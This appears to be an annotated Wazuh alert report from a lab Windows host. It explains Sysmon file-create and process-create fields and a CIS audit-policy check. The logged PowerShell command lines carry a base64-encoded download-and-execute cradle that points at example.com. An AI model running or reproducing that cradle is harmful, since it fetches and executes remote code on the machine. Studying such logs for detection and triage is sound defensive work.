🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:02.416+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:02.416+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  85
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534342.1762953
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Sysmon here, so data.win.system.eventID follows Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider ({5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's). Use it for exact provider filters in XPath queries or WEF subscriptions.

data.win.system.eventID:  11
Event ID within the provider's own numbering. For Sysmon, 11 = FileCreate (and 1 = ProcessCreate); don't read it as a Security-log ID like 4688.

data.win.system.version:  2
Schema version of this event type. Sysmon bumps it when it adds fields, so parsers keyed on field position can break after an upgrade.

data.win.system.level:  4
Windows event level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon logs every event at 4, so severity comes from the Wazuh rule, not from this field.

data.win.system.task:  11
Task category. For Sysmon it mirrors the event ID (11 = FileCreate).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:00.0401311Z
When the event was written to the channel (UTC). Compare with data.win.eventdata.utcTime (when the file was created) and the Wazuh timestamp (when it was indexed) to measure ingest lag; here about two and a half seconds end to end.

data.win.system.eventRecordID:  285022
Incremental log record number – handy for timeline order. Note it is the very next record after the ProcessCreate above.

data.win.system.processID:  3712
PID of the process that wrote the event: the Sysmon service itself, not the process being reported. Don't confuse it with data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the event. Forensic noise; safe to ignore.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the agent reads. Must be listed explicitly in the agent's <localfile> configuration or Sysmon events never reach Wazuh.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch points to a renamed host or a forwarded event.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:00.003 ProcessGuid: {94294ddc-bd82-680a-910b-000000000e00} ProcessId: 13540 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_fgj5ikc3.txg.ps1 CreationUtcTime: 2025-04-24 22:39:00.003 User: Attacker\Attcker1"
Full rendered event text (Sysmon FileCreate). Every data.win.eventdata field below is parsed from it, so read it whenever a parsed value looks truncated or mis-escaped.

data.win.eventdata.utcTime:  2025-04-24 22:39:00.003
When Sysmon observed the file create (UTC, millisecond precision). This is the forensic timestamp; data.win.system.systemTime is only when it was logged.

data.win.eventdata.processGuid:  {94294ddc-bd82-680a-910b-000000000e00}
Sysmon's unique ID for the creating process, stable across PID reuse. It equals the processGuid of the EID 1 alert just above and the parentProcessGuid of the next one: this PowerShell was spawned by the previous instance, wrote this file on start-up, and went on to spawn the next.

data.win.eventdata.processId:  13540
PID at the time of the event. PIDs are recycled once a process exits, so pivot on processGuid rather than on this.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Process that created the file: a genuine System32 powershell.exe, which is exactly what writes the file named below.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_fgj5ikc3.txg.ps1
Path of the created file. __PSScriptPolicyTest_<8 chars>.<3 chars>.ps1 in %TEMP% is written (and then deleted) by powershell.exe itself at start-up to test whether AppLocker/WDAC script enforcement applies; it is a launch artefact, not a payload drop. The rule fires on any .ps1 landing in Temp, so the 'Executable file dropped' headline overstates this event; the real signal is the PowerShell launch that produced it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:00.003
Creation timestamp carried by the file itself. A value well before utcTime means an existing file was overwritten or its timestamp was reset; here it equals utcTime, i.e. a fresh file.

data.win.eventdata.user:  Attacker\\Attcker1
Account the creating process runs as (DOMAIN\user). The same local account appears on every PowerShell event in this report.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:39:05.369+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] – no ATT&CK mapping; this is a configuration-assessment (SCA) result, not a detection.

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:05.369+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.3']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
CIS Critical Security Controls mapping (control 8.5).

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534345.1765722
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26159
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit events generated by the management of task scheduler jobs or COM+ objects. For scheduler jobs, the following are audited: - Job created. - Job deleted. - Job enabled. - Job disabled. - Job updated. For COM+ objects, the following are audited: - Catalog object added. - Catalog object updated. - Catalog object deleted. The recommended state for this setting is: Success and Failure.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The unexpected creation of scheduled tasks and COM+ objects could potentially be an indication of malicious activity. Since these types of actions are generally low volume, it may be useful to capture them in the audit logs for use during an investigation.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Other Object Access Events
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.3
CIS benchmark recommendation number carried at check level (same as rule.cis above).

data.sca.check.compliance.cis_csc:  8.5
CIS Critical Security Controls mapping at check level (same as rule.cis_csc above).

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Other Object Access Events"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
Outcome of this run: passed, failed, or not applicable. 'not applicable' is not a pass; here it means the check could not be evaluated (see reason), so treat the setting as still failing until a scan completes.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Other Object Access Events"'
Why the check could not be scored: the agent's SCA engine gave up waiting on auditpol.exe. Run the command above on the host yourself; if the subcategory shows 'No Auditing', enable it with auditpol /set /subcategory:"Other Object Access Events" /success:enable /failure:enable (or through the GP path in remediation) and trigger a fresh SCA scan to confirm.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label. For an SCA scan timeout Medium overstates urgency; the actionable item is the previous run's 'failed', which means scheduled-task and COM+ changes on this host are not being audited.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:06.352+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:06.352+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  82
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534346.1769247
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Sysmon here, so data.win.system.eventID follows Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider ({5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's). Use it for exact provider filters in XPath queries or WEF subscriptions.

data.win.system.eventID:  1
Event ID within the provider's own numbering. For Sysmon, 1 = ProcessCreate; the Security-log equivalent is 4688, which lacks the hashes and GUIDs you get here.

data.win.system.version:  5
Schema version of this event type. Sysmon bumps it when it adds fields, so parsers keyed on field position can break after an upgrade.

data.win.system.level:  4
Windows event level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon logs every event at 4, so severity comes from the Wazuh rule, not from this field.

data.win.system.task:  1
Task category. For Sysmon it mirrors the event ID (1 = ProcessCreate).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:03.9444278Z
When the event was written to the channel (UTC). Compare with data.win.eventdata.utcTime (when the process started) and the Wazuh timestamp (when it was indexed) to measure ingest lag; here roughly four seconds end to end.

data.win.system.eventRecordID:  285082
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event: the Sysmon service itself, not the process being reported. Don't confuse it with data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the event. Forensic noise; safe to ignore.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the agent reads. Must be listed explicitly in the agent's <localfile> configuration or Sysmon events never reach Wazuh.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch points to a renamed host or a forwarded event.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:02.373 ProcessGuid: {94294ddc-bd86-680a-940b-000000000e00} ProcessId: 5364 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd82-680a-910b-000000000e00} ParentProcessId: 13540 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:02.373
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd86-680a-940b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5364
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd82-680a-910b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:06.576+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:06.576+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  86
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534346.1777314
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:04.3702749Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285088
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:04.338 ProcessGuid: {94294ddc-bd86-680a-940b-000000000e00} ProcessId: 5364 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4t3svkop.qwu.ps1 CreationUtcTime: 2025-04-24 22:39:04.338 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:04.338
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd86-680a-940b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5364
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4t3svkop.qwu.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:04.338
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:10.603+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:10.603+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  83
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534350.1780079
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:08.2011382Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285123
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

